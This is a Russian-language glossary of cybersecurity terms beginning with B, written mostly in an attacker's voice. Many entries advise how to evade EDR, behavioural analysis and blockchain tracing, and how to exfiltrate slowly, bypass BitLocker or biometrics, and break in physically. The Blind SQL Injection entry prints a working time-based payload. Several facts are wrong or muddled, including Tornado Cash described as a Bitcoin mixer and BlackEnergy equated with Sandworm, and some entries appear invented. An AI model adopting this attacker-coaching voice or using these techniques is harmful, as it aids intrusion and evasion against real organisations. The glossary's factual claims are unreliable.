Bash Bunny Продвинутое устройство для физического пентеста, созданное Hak5. Отличается от Rubber Ducky возможностью переключаться между режимами: эмуляция клавиатуры (ввод команд), эмуляция Ethernet-адаптера (MITM-атака через DHCP), дамп памяти через DMA (Direct Memory Access) при подключении к FireWire/Thunderbolt, а также возможность выполнения нескольких скриптов последовательно. Bash Bunny имеет встроенный процессор и хранилище, что позволяет ему действовать автономно. При подключении к компьютеру жертвы устройство представляется как USB-накопитель, затем переключается в режим клавиатуры, выполняет скрипт, затем переключается в режим Ethernet для перенаправления трафика всё в рамках одной минуты. Используется The Com для физического проникновения в офисы после tailgating.

Bastion Host Специально сконфигурированный сервер (jump server, jump box), через который осуществляется доступ к защищенным сегментам сети: production-средам, базам данных, OT-сетям (промышленное управление), сетям с конфиденциальными данными. Bastion host единственная точка входа в эти сегменты, что делает его критической целью для атакующего. Если Bastion host скомпрометирован, атакующий получает доступ ко всем системам, которые находятся за ним. Компрометация Bastion host достигается через: уязвимости SSH/RDP, кражу ключей доступа, session hijacking (перехват сессии уже подключенного администратора). Interlock, после взлома Cisco FMC, использовал его как Bastion host для доступа к внутренним сетям жертв, обходя межсетевые экраны.

BAT (Batch File) Файл с расширением .bat, содержащий последовательность команд для командной строки Windows (cmd.exe). В современном хакерском арсенале BAT-файлы используются как простейшие скрипты для: скачивания полезной нагрузки (curl, bitsadmin, powershell), отключения защит (sc stop, net stop), создания persistence (schtasks, reg add), очистки логов (wevtutil). BAT-файлы часто игнорируются антивирусами, потому что это просто текстовый файл, а не исполняемый бинарник. Современные EDR могут детектировать выполнение команд из BAT, но обход достигается через запуск BAT-файла из легитимного процесса (explorer.exe) и использование аргументов, имитирующих легитимную административную активность.

Baud Rate Скорость передачи данных в последовательных интерфейсах (RS-232, RS-422, RS-485), измеряемая в символах в секунду. В промышленных системах (SCADA, PLC, DCS) baud rate жестко задан в конфигурации контроллера. Атака на baud rate заключается в изменении этого параметра: если контроллер настроен на 9600, а оператор пытается подключиться на 115200, соединение не устанавливается. Это приводит к потере управления. В атаке на водоканал в Техасе злоумышленники изменили baud rate контроллеров химической обработки воды через удаленный доступ, после чего операторы не могли подключиться к системе для ручного управления пришлось отправлять бригады на объект. Изменение baud rate не требует сложного эксплойта, достаточно прав на запись конфигурации контроллера.

Bazaar (Abuse.ch) Платформа с открытым доступом для обмена образцами малвари между исследователями безопасности, вендорами антивирусов и SOC-аналитиками. На Bazaar загружаются тысячи образцов малвари ежедневно, которые затем анализируются, хэши добавляются в базы антивирусов, поведенческие паттерны изучаются. Если малварь попадает в Bazaar, она становится "сожженной": антивирусы детектят ее в течение 24-48 часов. Для атакующего попадание в Bazaar означает, что билд нужно менять, обфусцировать, пересобирать. Используются полиморфные генераторы, уникальные билды под каждую жертву, чтобы избежать попадания в публичные коллекции.

BBOT OSINT-фреймворк с открытым кодом для автоматической рекогносцировки. BBOT сканирует: DNS (поддомены через crt.sh, dnsdumpster), WHOIS (регистраторы, даты регистрации), Shodan и Censys (открытые порты, сервисы), GitHub (утечки ключей, коммиты сотрудников), социальные сети (профили сотрудников), Wayback Machine (старые версии сайтов). BBOT позволяет за часы собрать полный профиль компании-цели: IP-адреса, email-адреса сотрудников, открытые порты, уязвимые версии софта, утекшие ключи. Используется как атакующими (для сбора информации перед атакой), так и защитниками (для поиска собственных уязвимостей).

BCP (Business Continuity Plan) Документированный план действий организации по поддержанию или восстановлению критических бизнес-процессов после инцидента. BCP включает: идентификацию критических процессов, допустимое время простоя (RTO Recovery Time Objective), допустимую потерю данных (RPO Recovery Point Objective), процедуры восстановления, запасные мощности. Для атакующего BCP важен, потому что если у жертвы нет BCP (или BCP не работает), ransomware парализует компанию на недели, увеличивая давление на выплату выкупа. JLR потерял 5 недель производства после атаки, потому что их BCP не предусматривал атаку на VMware ESXi через Intune. В ходе атаки BCP может быть нарушен через: уничтожение бэкапов, шифрование систем управления восстановлением, компрометацию запасных площадок.

BDD (Behavior-Driven Development) Методология разработки, фокусирующаяся на описании поведения системы через сценарии на естественном языке (Gherkin: Given-When-Then). BDD-тесты часто запускаются в CI/CD-пайплайнах, имеют повышенные привилегии (доступ к production-данным), и игнорируются security-сканерами, потому что считаются "тестами". Для атакующего BDD-тесты вектор supply chain атаки: можно внедрить вредоносный код в BDD-тест, который выполнится в production-среде. Или через BDD-тест, который делает запросы к API с правами сервисного аккаунта, эксфильтровать данные. BDD-фреймворки (Cucumber, Behave, SpecFlow) редко рассматриваются как attack surface, что делает их привлекательной целью.

BEC (Business Email Compromise) Целенаправленная атака на корпоративную почту с целью финансового мошенничества. BEC не использует малварь (хотя может включать первоначальный взлом через фишинг). Классическая схема: злоумышленники компрометируют почтовый ящик сотрудника (часто финансового директора или бухгалтера), изучают переписку, выявляют регулярные платежи и поставщиков, затем отправляют поддельное письмо от имени руководителя с просьбой срочно перевести деньги на новый счет. В продвинутых версиях используются deepfake видео и голос: атакующий звонит бухгалтеру, имитируя гендиректора, и просит перевести средства, подтверждая "я сейчас на совещании, не могу подписать, сделайте по email". BEC-атаки приносят миллиарды долларов ущерба ежегодно, часто превосходя ransomware по объему украденных средств.

BeEF (Browser Exploitation Framework) Фреймворк с открытым кодом для эксплуатации веб-браузеров. BeEF работает по принципу: атакующий отправляет жертве ссылку (через фишинг, XSS, вставку в комментарий), при переходе по ссылке браузер жертвы устанавливает постоянное соединение (hook) с BeEF-сервером. После этого атакующий может: читать cookies (session hijacking), делать скриншоты экрана, красть пароли из форм, выполнять произвольный JavaScript, переходить по внутренним ссылкам (pivot в корпоративной сети), эксплуатировать уязвимости браузера. BeEF особенно эффективен в корпоративной среде, где браузеры часто устаревшие (из-за legacy-приложений) и имеют расширенные права в сети.

Behavioral Analysis Метод обнаружения угроз, основанный на анализе поведения процессов и пользователей, а не на сигнатурах (хэшах, строках). EDR (CrowdStrike, SentinelOne, Microsoft Defender for Endpoint) использует поведенческий анализ для выявления аномалий: процесс создал файл в системной папке, процесс пытается остановить антивирус, пользователь скачал и запустил скрипт из интернета. Для обхода поведенческого анализа используется behavioral blending имитация легитимного поведения. Если атакующий крадет данные через Rclone, он делает это медленно (low & slow), в рабочие часы, с IP-адреса, который раньше использовал пользователь, использует легитимные команды Rclone (которые администраторы используют для бэкапов). Система видит "администратор делает бэкап" и не тревожится.

Behavioral Blending Техника обхода поведенческого анализа (behavioral analysis), заключающаяся в имитации легитимного поведения пользователя или системного процесса. Вместо того чтобы дампнуть NTDS.dit за одну минуту (аномалия, сразу триггерит алерт), атакующий дампит его в течение нескольких дней маленькими частями, используя легитимный процесс ntdsutil, который администраторы используют для бэкапов. Вместо того чтобы запускать Mimikatz с параметрами, которые детектятся, атакующий использует reflection-загрузку (Mimikatz загружается в память без записи на диск) и запускает команды, имитирующие легитимные административные действия. Behavioral blending требует глубокого понимания нормального поведения в целевой сети, что достигается через длительную разведку (recon).

Bell-LaPadula Model Классическая модель безопасности, разработанная в 1973 году для Министерства обороны США. Модель фокусируется на конфиденциальности и описывает правила: "no read up" (субъект с низким уровнем доступа не может читать объекты с высоким уровнем), "no write down" (субъект с высоким уровнем доступа не может писать в объекты с низким уровнем). В современных системах Bell-LaPadula считается теоретической основой, но не применяется напрямую. Современные системы используют более сложные модели: RBAC (ролевая), ABAC (атрибутная), MAC (мандатная). Для атакующего Bell-LaPadula интересна как иллюстрация того, как мыслили защитники 50 лет назад; современные атаки часто направлены на обход именно этих классических принципов через каналы, которые модель не учитывает (covert channels, side channels).

BGP Hijacking Перехват управления IP-префиксами через протокол BGP (Border Gateway Protocol). Злоумышленник объявляет (через своего AS Autonomous System) о том, что владеет IP-блоком, который на самом деле ему не принадлежит. Соседние маршрутизаторы принимают это объявление, и трафик, предназначенный для законного владельца, начинает идти через серверы злоумышленника. Используется для: MITM (man-in-the-middle перехват и модификация трафика), кражи криптовалют (подмена адресов бирж), DDoS-отражения (направление трафика на жертву), обхода санкций (перенаправление трафика через страны, где нет блокировок). Иран использовал BGP hijacking для перенаправления трафика AWS после ударов по дата-центрам, чтобы затруднить восстановление облачных сервисов в регионе.

BiDi (Bidirectional) Двунаправленные протоколы связи, позволяющие серверу отправлять данные клиенту без предварительного запроса. В контексте C2 (Command and Control) BiDi-протоколы (WebSocket, gRPC, QUIC) используются для создания постоянного канала управления: агент открывает соединение к C2 и удерживает его открытым; C2 может отправлять команды в любое время, не дожидаясь heartbeat-запроса. Это ускоряет реакцию и снижает количество сетевых соединений (меньше шансов быть замеченным). WebSocket особенно популярен, потому что трафик выглядит как обычный HTTPS (использует порт 443, шифрование TLS), и многие корпоративные прокси не фильтруют WebSocket-соединения.

Big Data Exploitation Эксплуатация больших данных, собранных компаниями для аналитики и обучения AI-моделей. Компании собирают терабайты данных: история покупок, медицинские записи, геолокация, поведенческие паттерны, голосовые записи звонков в поддержку. Если эти датасеты украдены, они могут быть: проданы конкурентам (стратегические данные), использованы для создания deepfake-моделей (голос, лицо), применены для targeted phishing (знание всех деталей жизни жертвы), или просто требоваться выкуп за непубликацию (компании скрывают утечки, чтобы не потерять доверие клиентов). Telus потерял 1PB+ данных, включая голосовые записи звонков идеальный материал для deepfake vishing кампаний.

Biometric Bypass Обход биометрической аутентификации (отпечатки пальцев, Face ID, распознавание лица, радужная оболочка глаза). Методы обхода: deepfake лица (видео сгенерированного лица для Face ID, особенно уязвимы системы без liveness detection), слепки пальцев (сфотографировать отпечаток с экрана телефона, создать 3D-модель из желатина или силикона), атаки на сенсоры (подача напряжения на контакты датчика отпечатков, эмуляция сигнала), replay attack (перехват и повтор биометрических данных, передаваемых между сенсором и процессором). Биометрия часто считается "неуязвимой", но в реальности большинство биометрических систем имеют известные уязвимости, и их обход не требует сложного оборудования. Handala в своих угрозах упоминала, что iPhone 12 Pro Max жертвы не защищен, потому что Face ID можно обойти.

BIOS (Basic Input/Output System) Базовая система ввода-вывода, прошивка, которая выполняется при включении компьютера, инициализирует аппаратное обеспечение и загружает операционную систему. BIOS хранится в чипе на материнской плате. В 2020-х BIOS заменяется на UEFI (Unified Extensible Firmware Interface), но термин "BIOS" часто используется для обозначения любого firmware. Для атакующего BIOS цель для firmware persistence: вредоносный код записывается в BIOS/UEFI, выполняется при каждой загрузке, до того как загрузится операционная система и антивирус. Обнаружить такой backdoor сложно (требуется вычитывание чипа программатором), удалить перепрошивка. Используется в APT-атаках для долгосрочного присутствия на уровне, который не может быть очищен переустановкой ОС.

Bitcoin (BTC) Первая и самая капитализированная криптовалюта, работающая на блокчейне с публичным реестром всех транзакций. В контексте киберпреступности Bitcoin используется для выплаты выкупов (ransomware), оплаты услуг на даркнете (доступы, инструменты, нуль-дни), отмывания средств. Проблема Bitcoin для атакующего: все транзакции публичны и могут быть отслежены через blockchain analysis (Chainalysis, CipherTrace). Поэтому Bitcoin используется только с миксерами (Tornado Cash, Sinbad) или через обменники BTC Monero (XMR), который обеспечивает приватность. Жертвы чаще готовы платить в Bitcoin, чем в Monero, потому что BTC более доступен и понятен.

BitLocker Технология шифрования дисков, встроенная в Windows (доступна в версиях Pro, Enterprise, Education). BitLocker использует TPM (Trusted Platform Module) для хранения ключей шифрования. Методы обхода BitLocker: TPM sniffing (перехват ключей из TPM при загрузке, требует физического доступа), recovery key theft (ключ восстановления часто хранится в Active Directory, в Microsoft Account, на распечатке в столе администратора доступ к этим источникам дает ключ), cold boot attack (охлаждение оперативной памяти жидким азотом, чтение ключей после выключения, требуется физический доступ), или использование уже скомпрометированной сессии (если пользователь уже залогинен, диск расшифрован и доступен). Если у атакующего есть BitLocker recovery key, диск расшифровывается без пароля.

Black Energy Вредоносное ПО, использованное в атаке на украинскую энергосистему в декабре 2015 года. Black Energy (также известный как Sandworm) отключал подстанции через SCADA-системы, уничтожал бэкапы, оставлял системы в неработоспособном состоянии. В 2026 Black Energy считается legacy, но его тактики (уничтожение бэкапов, отключение критической инфраструктуры, длительное присутствие) повторяются в современных атаках. Handala в атаке на Stryker использовал похожую тактику: вместо малвари легитимные Intune команды, результат тот же: парализованная инфраструктура, уничтоженные устройства, отсутствие возможности быстрого восстановления.

Black Hat Категория хакеров, которые взламывают системы в личных целях или в интересах третьих лиц, нарушая закон. Black hat действуют без разрешения владельцев систем, их цели финансовая выгода, кража данных, шпионаж, разрушение. Противопоставляются white hat (этичные хакеры, работающие с разрешения, часто в рамках bug bounty программ) и grey hat (действуют без разрешения, но не с целью навредить, часто сообщают об уязвимостях владельцам). В реальности границы размыты: государственные хакеры (APT) являются black hat по определению (атакуют системы других государств без разрешения), но их действия одобрены их правительствами и часто не преследуются.

Black Market Даркнет-рынки, где торгуют незаконными товарами и услугами: украденными данными (fullz, логины, пароли, cookies), доступом к взломанным системам (RDP, SSH, web-shell), инструментами для взлома (Cobalt Strike лицензии, инфостилеры), нуль-днями (неизвестные уязвимости), услугами (DDoS-as-a-Service, Ransomware-as-a-Service). Крупнейшие black market 2026: AlphaBay (возрожден), Russian Market (специализация на RDP-доступах и стилер-логах), форумы Exploit и XSS (для более продвинутых игроков). Оплата только в криптовалюте (Monero предпочтительнее Bitcoin), часто с использованием эскроу-сервисов для безопасности сделки. Цены: доступ к корпоративной сети $5005000, fullz (полное досье) $50200, нуль-день $100k$1M.

BlackCat (ALPHV) RaaS (Ransomware-as-a-Service) операция, использующая малварь, написанную на Rust. Rust выбран за: кроссплатформенность (Windows, Linux, VMware ESXi), сложность реверс-инжиниринга (по сравнению с C/C++), встроенные механизмы защиты памяти. BlackCat практикует двойной шантаж: шифрование файлов + угроза публикации украденных данных. Аффилиаты (партнеры) получают до 80% выкупа. BlackCat известна атаками на критическую инфраструктуру, включая энергетику и здравоохранение. В 2026 BlackCat остается одной из крупнейших RaaS операций, несмотря на периодические takedown их инфраструктуры law enforcement.

Blacklisting Метод защиты, основанный на блокировке известных угроз: IP-адресов, доменов, хэшей файлов, строк в коде. В современном ландшафте blacklisting считается устаревшим, потому что атакующие меняют хэши при каждой компиляции (полиморфная малварь), домены меняются через DGA (Domain Generation Algorithm), IP-адреса через быстрое переключение (fast flux). Защитники переходят на поведенческий анализ (behavioral detection), который смотрит на действия процесса, а не на его подпись. Blacklisting все еще используется для блокировки известных C2-доменов, которые не успели сменить, и для защиты от массовых кампаний, где атакующие не меняют инфраструктуру.

BlackTech APT-группа, связанная с Китаем (также известна как Tropic Trooper, Earth Hundun). Активна с 2007 года, специализируется на шпионаже в технологическом, телекоммуникационном, аграрном и правительственном секторах в Азии. BlackTech использует supply chain атаки (внедрение backdoor в легитимное ПО через взлом инфраструктуры разработки), credential harvesting (кража паролей), длительное присутствие (years). Инструментарий включает кастомные бэкдоры (Plead, PlugX), легитимные RMM-инструменты для легитимизации трафика. Для атакующего BlackTech интересна как источник TTPs (тактик, техник, процедур) для изучения.

Blind SQL Injection Тип SQL-инъекции, при котором результат выполнения запроса не выводится на страницу (blind "слепой"). Атакующий не видит напрямую данные из базы, но может задавать вопросы, на которые сервер отвечает косвенно. Два основных метода: time-based (задержка ответа если условие истинно, сервер спит 5 секунд; если ложно отвечает сразу) и boolean-based (разница в ответе если условие истинно, страница отображается нормально; если ложно отображается ошибка или другая страница). Например, запрос: ' AND IF(SUBSTRING(password,1,1)='a', SLEEP(5), 0) -- позволяет по одному символу восстановить пароль. Медленно, но работает даже на приложениях с высокой защитой, где нет вывода ошибок SQL.

Blind XSS Тип XSS (Cross-Site Scripting), при котором вредоносный скрипт срабатывает не у жертвы, которая его ввела, а в другом месте, где жертва не видит результат. Классический сценарий: атакующий вставляет XSS-пейлоад в поле комментария, которое сохраняется в базе данных; когда администратор открывает панель управления для модерации комментариев, скрипт выполняется в браузере администратора, крадя его cookies, сессионные токены, делая действия от его имени. Администратор не видит, что что-то произошло (скрипт может выполняться в фоновом режиме). Blind XSS используется для session hijacking (угон сессии) и эскалации привилегий (получение доступа админа). ShinyHunters мог использовать Blind XSS в Salesforce Experience Cloud для кражи сессий суперадминов.

Blockchain Analysis Анализ блокчейна для отслеживания движения криптовалют. Компании (Chainalysis, CipherTrace, Elliptic) предоставляют сервисы, которые анализируют публичный реестр транзакций Bitcoin, Ethereum и других блокчейнов, кластеризуют адреса, связывают их с биржами, миксерами, известными злоумышленниками. Blockchain analysis используется law enforcement для отслеживания выкупов (ransomware payments) и ареста преступников. Для обхода атакующий использует: Monero (XMR) приватная криптовалюта, где транзакции не отслеживаются; миксеры (Tornado Cash, Sinbad) для Bitcoin; chain hopping (BTC XMR DeFi чистые деньги) для полного запутывания следа. Handala, вероятно, использовала Monero для получения средств, если Stryker заплатил выкуп.

Blockchain Exploitation Атаки на блокчейн-протоколы, смарт-контракты и DeFi-приложения. Типы атак: reentrancy (повторный вход в контракт до обновления состояния, классика The DAO 2016), flash loan attacks (флеш-кредиты без залога для манипуляции рынком или эксплуатации уязвимостей), oracle manipulation (манипуляция источниками цен, которые используют DeFi-протоколы), arithmetic overflow/underflow (переполнение чисел в смарт-контрактах), private mempool manipulation (фронтраннинг, сэндвич-атаки через приватные мемпулы). Bybit $1.5B (через supply chain, не напрямую DeFi), Venus $3.7M (flash loan + vault bug) примеры. DeFi остается диким западом: протоколы запускаются с багами, миллиарды долларов в уязвимых контрактах, аудиты часто поверхностны.

BloodHound Инструмент с открытым кодом для визуализации и анализа attack paths в Active Directory. BloodHound собирает данные о пользователях, группах, компьютерах, отношениях (кто входит в какие группы, у кого есть локальный админ на каких компьютерах, какие делегированы права) и строит граф, показывающий кратчайший путь к Domain Admin. SharpHound (сборщик данных) запускается на скомпрометированной системе, собирает информацию и передает на BloodHound-сервер. Атакующий использует BloodHound, чтобы понять: "у меня есть доступ к компьютеру пользователя A, у пользователя A есть локальный админ на сервере B, на сервере B залогинен администратор домена" это путь к полному контролю над сетью. BloodHound стандартный инструмент post-exploitation.

Blue Team Подразделение кибербезопасности, отвечающее за защиту организации: SOC (Security Operations Center), IR (Incident Response), threat hunters, инженеры безопасности. Blue Team строит детекты (EDR, SIEM), реагирует на инциденты, ищет скрытые угрозы (threat hunting). Для атакующего Blue Team главный противник. Успешная атака это атака, которую Blue Team не заметил или заметил слишком поздно. Атакующий изучает, как Blue Team мыслит: какие детекты ставит, какие артефакты ищет, какие инструменты использует (CrowdStrike, SentinelOne, Splunk, Sentinel), и строит evasion так, чтобы быть невидимым. Если Blue Team заметил атаку атакующий проиграл (или должен очень быстро завершить операцию до того, как доступ заблокируют).

BlueBorne Набор из восьми уязвимостей в Bluetooth-стеке (CVE-2017-0781 и другие), обнаруженный в 2017 году. BlueBorne позволяет выполнить произвольный код на устройстве через Bluetooth без взаимодействия с пользователем (0-click), без необходимости спаривания устройств. Уязвимы были миллиарды устройств: Android, iOS, Windows, Linux. В 2026 BlueBorne все еще актуален для старых устройств, которые не получили обновления: медицинские устройства (кардиомониторы, инсулиновые помпы), промышленные контроллеры, автомобильные системы, умные колонки. Handala могла использовать BlueBorne для доступа к медицинским устройствам Stryker, но выбрала Intune как более масштабируемый вектор.

BlueSmack DoS-атака (Denial of Service) через Bluetooth, отправляющая большой пакет данных на устройство, вызывая его зависание, перезагрузку или сброс соединения. Используется для disruption: отключить камеры наблюдения перед физическим проникновением (tailgating), вывести из строя систему контроля доступа, парализовать работу устройства во время операции. BlueSmack работает против уязвимых Bluetooth-стеков, особенно на старых устройствах (legacy IoT, промышленные контроллеры). Не требует предварительного спаривания.

Bluesnarfing Кража данных через Bluetooth без ведома владельца устройства. Bluesnarfing использует уязвимости в OBEX (Object Exchange) протоколе для доступа к телефонной книге, SMS, фотографиям, календарю. Требует физической близости (до 10-30 метров) и включенного Bluetooth в discoverable режиме. В корпоративной среде сотрудники часто оставляют Bluetooth включенным на ноутбуках, что делает их уязвимыми в офисных зонах общего доступа (коворкинги, кафе, аэропорты). Bluesnarfing используется для сбора данных о сотрудниках (телефоны, контакты) для последующей социальной инженерии.

BlueZ Официальный Bluetooth-стек для Linux, используемый в Android, IoT-устройствах, автомобильных системах, промышленных контроллерах. Уязвимости в BlueZ могут дать remote code execution (RCE) на устройстве через Bluetooth. BlueZ имеет сложную кодовую базу (сотни тысяч строк), что делает его подверженным ошибкам. Для атакующего BlueZ интересен как attack surface для получения доступа к Linux-устройствам, которые не имеют сетевого подключения, но имеют Bluetooth (многие IoT-устройства). Компрометация через Bluetooth может быть начальной точкой входа в сеть, где устройство имеет проводное соединение с корпоративной сетью.

BMC (Baseboard Management Controller) Контроллер управления материнской платой, обеспечивающий удаленное управление сервером даже при выключенной операционной системе. Известные реализации: iDRAC (Dell), iLO (HPE), IMM (Lenovo), IPMI (стандарт). BMC имеет отдельный сетевой интерфейс, управляет питанием, переустановкой ОС, имеет доступ к системе на аппаратном уровне. Для атакующего BMC критическая цель: компрометация BMC дает полный контроль над сервером, возможность загрузить произвольный образ ОС, прочитать память, установить backdoor в firmware. Используется в APT-атаках для долгосрочного присутствия, потому что переустановка ОС не очищает BMC.

BMP (Background Monitoring Process) Фоновый процесс мониторинга, который всегда работает в системе: svchost.exe (Windows), explorer.exe, Teams.exe, Zoom.exe, процессы антивируса. Для атакующего BMP цель для process injection: мы внедряем вредоносный код в процесс, который уже работает и не вызывает подозрений. EDR видит: "Teams.exe делает то, что Teams.exe обычно делает" и не тревожится. Process injection через BMP (Reflective DLL Injection, Process Hollowing) позволяет скрыть малварь в легитимном процессе, не создавая новых процессов, которые могли бы быть замечены.

BN (Binary Ninja) Дизассемблер и фреймворк для reverse engineering, альтернатива IDA Pro и Ghidra. Binary Ninja отличается удобным API, поддержкой плагинов на Python, современным интерфейсом. Используется исследователями безопасности для анализа малвари, поиска уязвимостей, reverse engineering протоколов. Для атакующего Binary Ninja инструмент для анализа защитных механизмов (как работает EDR, какие хуки ставит, как упакован антивирус), а также для разработки эксплойтов (поиск уязвимых мест в софте). Binary Ninja имеет лицензию (коммерческую и бесплатную для некоммерческого использования).

Bob (Bob Dyachenko) Исследователь безопасности, основатель SecurityDiscovery. В 2025 году обнаружил открытый Elasticsearch кластер с 4+ миллиардами записей PII граждан Китая (китайская surveillance network). Боб специализируется на поиске незащищенных баз данных, открытых S3-бакетов, misconfig в облачных хранилищах. Его работа напоминание для атакующего: даже крупные организации и государственные структуры оставляют незащищенные базы данных в интернете. Shodan, Censys, и навыки поиска misconfig могут дать доступ к миллиардам записей без единого эксплойта.

Bogon IP-адреса, которые не должны появляться в интернете: приватные диапазоны (10.0.0.0/8, 172.16.0.0/12, 192.168.0.0/16), multicast (224.0.0.0/4), loopback (127.0.0.0/8), link-local (169.254.0.0/16). В атаках bogon-адреса используются для обхода фильтрации: некоторые CDN и облачные провайдеры не фильтруют bogon-адреса должным образом. Используя bogon как source IP в спуфинговых атаках (spoofing), можно обмануть системы, которые доверяют "внутренним" адресам. Также bogon-фильтры на сетевом оборудовании иногда пропускают трафик из "неправильных" диапазонов из-за ошибок конфигурации, что можно использовать для C2.

Bootkit Загрузочный руткит, который заражает загрузочный сектор (MBR Master Boot Record) или UEFI-прошивку. Bootkit загружается до операционной системы, может перехватывать процесс загрузки ядра, модифицировать его в памяти, скрывать свое присутствие от ОС и антивирусов. Обнаружить bootkit сложно: требуется проверка подписи загрузчика, вычитывание MBR, сравнение с эталоном. Удалить bootkit сложно: переустановка ОС не помогает, требуется перезапись MBR или перепрошивка UEFI. Bootkit используется в APT-атаках (например, Equation Group, LoJax) для долгосрочного присутствия на уровне, который не может быть очищен стандартными средствами.

Bootstrap Protocol (BOOTP) Устаревший сетевой протокол для автоматической настройки сетевых устройств (предшественник DHCP). BOOTP используется в старых принтерах, сетевых хранилищах, промышленных контроллерах, thin clients. Уязвимости в BOOTP (отсутствие аутентификации, возможность перенаправления трафика) могут дать выполнение кода или перенаправление загрузочного образа на сервер атакующего. Для атакующего BOOTP интересен как legacy attack surface: современные пентесты часто игнорируют старые протоколы, но в промышленных и медицинских системах они все еще используются.

Bot Herder Оператор ботнета, который контролирует тысячи (или миллионы) зараженных устройств (ботов). Ботхердер управляет ботнетом через C2 (Command and Control), отдавая команды: начать DDoS-атаку, загрузить новый модуль (stealer, miner, ransomware), обновить конфигурацию. Ботхердеры продают доступ к ботам как услугу (DDoSaaS DDoS as a Service, прокси-сервисы для обхода геоблокировок, спам-рассылки). Для атакующего ботнет это ресурс: можно использовать ботнет для отвлечения (DDoS) во время основной атаки, как прокси для C2 (чтобы скрыть реальный IP), или как вычислительную мощность для взлома паролей (GPU-фермы из ботов).

Botnet Сеть зараженных устройств (ботов), управляемая злоумышленником через C2 (Command and Control). Ботнеты используются для: DDoS-атак (Mirai, BASHLITE), криптомайнинга (Coinhive-подобные), прокси-сервисов (обходим геоблокировок, скрытие трафика), отправки спама и фишинга, брутфорса паролей (распределенный перебор), сканирования уязвимостей. Устройства в ботнете это компьютеры, серверы, IoT-устройства (камеры, роутеры, принтеры), мобильные телефоны. Размеры ботнетов: от тысяч до миллионов устройств. Крупные ботнеты (например, 3ve) могут генерировать десятки миллионов долларов в год для операторов. Ботнеты продаются и сдаются в аренду (DDoSaaS, proxy-as-a-service).

Bounty (Bug Bounty) Программы вознаграждения за найденные уязвимости, запускаемые компаниями (Google, Microsoft, Apple) и платформами (HackerOne, Bugcrowd). Исследователи безопасности получают вознаграждение ($100$100,000+) за сообщение об уязвимости до того, как она будет использована злоумышленниками. Для атакующего bug bounty источник информации о fresh 1-day уязвимостях. Компании обычно дают 90 дней до публичного раскрытия после получения отчета. В это время уязвимость не публична, но может быть использована атакующим, если он узнал о ней (через инсайдеров, утечки, или просто мониторинг disclose-таймлайнов). После публичного раскрытия уязвимость становится 1-day, и многие организации еще не установили патч.

BPF (Berkeley Packet Filter) Механизм в ядре Linux для фильтрации и обработки пакетов на уровне ядра. eBPF (extended BPF) позволяет загружать пользовательские программы в ядро для мониторинга, трассировки, фильтрации сетевого трафика. Для атакующего eBPF двойной инструмент: с одной стороны, eBPF используется защитниками для обнаружения аномалий (Falco, Cilium); с другой стороны, eBPF-программа может быть использована для сокрытия перехватывать системные вызовы, скрывать файлы, процессы, сетевые соединения от EDR и ядра. eBPF-бэкдоры сложно детектить, потому что eBPF-программа загружается в ядро легитимным путем (через bpf() syscall), и многие системы не проверяют eBPF-программы на вредоносность.

BPF (Business Process Framework) Описание бизнес-процессов компании: как выставляются счета, кто подписывает платежи, какие есть approvals, как обрабатываются заказы. В BEC-атаках (Business Email Compromise) атакующий изучает Business Process Framework целевой компании, чтобы подделать процесс. Например, если компания платит поставщикам через определенную систему, атакующий подделывает счет от имени поставщика, используя знание форматов, терминологии, внутренних кодов. BEC работает, потому что атакует процессы, а не код. Знание Business Process Framework получается через компрометацию почты, OSINT (изучение публичных тендеров, вакансий, LinkedIn сотрудников), или через инсайдеров.

BPO (Business Process Outsourcing) Аутсорсинг бизнес-процессов: передача функций (call-центры, обработка данных, HR, бухгалтерия) сторонним компаниям. BPO-провайдеры (Conduent, Telus, Accenture) обрабатывают данные сотен клиентов: банков, страховых, ритейлеров, медицинских организаций. Для атакующего BPO-провайдер цель с высоким мультипликатором: взлом одного BPO дает доступ к данным десятков крупных компаний. Telus (BPO-гигант) цель ShinyHunters: 1PB+ данных, включая голосовые записи звонков для deepfake vishing, PII миллионов клиентов. Conduent 25M+ записей через supply chain атаку на подрядчика.

Brass Knuckles Инструменты для физического пентеста: обход замков. Включают: bump keys (отмычки для цилиндровых замков, работают ударом), impressioning (создание ключа по следу на пустой заготовке), electric pick guns (электрические отмычки, вибрирующие иглы), ломы, отжимы для дверей. Для электронных замков RFID-клонирование (Proxmark3), эмуляция карт (в том числе MIFARE Classic, который взломан). Физический доступ часто проще, чем взлом сети: заходим за сотрудником (tailgating), открываем дверь (bump key), подключаемся к внутренней сети через Ethernet-порт, ставим drop device (Raspberry Pi с 4G-модемом). Brass knuckles часть арсенала при атаках на компании с хорошей сетевой защитой, но слабой физической.

Breach and Attack Simulation (BAS) Автоматизированные платформы для тестирования защит (AttackIQ, Cymulate, SafeBreach, Picus). BAS запускают симуляции известных техник атак (MITRE ATT&CK) в безопасной среде и проверяют, сработали ли детекты (EDR, SIEM, NGFW). Для атакующего BAS важен, потому что если организация использует BAS, ее защитники знают, какие техники детектятся, и настраивают защиту соответственно. Использование техники, которая входит в стандартный BAS-набор, может привести к быстрому обнаружению. Поэтому атакующий должен использовать менее распространенные техники, новые TTPs, техники, которые BAS не покрывает (например, AILM, Intune abuse).

BreachForums Форум для публикации утечек данных (data breaches), возрожденный после закрытия оригинального BreachForums в 2023 году. На BreachForums выкладываются дампы баз данных (CarGurus, Wynn, Berkadia), объявления о продаже доступов (RDP, SSH, web-shell), обсуждения техник взлома. ShinyHunters использует BreachForums для публикации ультиматумов жертвам ("FINAL WARNING") и для выкладывания доказательств (proof samples). После публикации утечки на BreachForums она быстро распространяется по другим форумам, Telegram-каналам, и попадает в общий доступ. Для атакующего BreachForums площадка для PR (public relations) вымогательства: публичное объявление о жертве создает давление на компанию заплатить выкуп.

Breadcrumb Небольшая ошибка конфигурации или утечка информации, которая ведет к полной компрометации системы. Breadcrumb может быть: комментарий в коде с паролем (// password: admin123), .git папка в public web (можно скачать исходный код), старая DNS-запись, ведущая на несуществующий сервер (subdomain takeover), публичный S3-бакет с конфигурационными файлами, утекший API-ключ на GitHub, файл robots.txt, раскрывающий внутренние пути. ShinyHunters ищет breadcrumb в Salesforce Experience Cloud: guest user с доступом к API это breadcrumb, который дает миллионы записей. Поиск breadcrumb основа OSINT-разведки перед атакой.

